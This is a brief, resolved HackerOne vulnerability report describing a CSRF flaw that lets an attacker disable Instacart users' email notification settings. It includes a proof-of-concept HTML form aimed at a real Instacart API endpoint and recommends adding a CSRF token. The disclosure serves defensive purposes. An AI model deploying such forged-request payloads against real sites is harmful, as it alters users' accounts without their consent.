CSRF To change Email Notification Settings
Unknown
Vulnerability Details
Hi i found CSRF To change Email Notification Settings
The Code Of the HTML Page ::
<html>
<body>
<form action="https://www.instacart.com/api/v2/email_settings/76/disable?resource_token=">
<input type="submit" value="Submit form" />
</form>
</body>
</html>
For Fixing you Must add CSEF Token to the Request
i attached Video Showing the Bug
Thanks
Actions
View on HackerOneReport Stats
- Report ID: 157956
- State: Closed
- Substate: resolved
- Upvotes: 8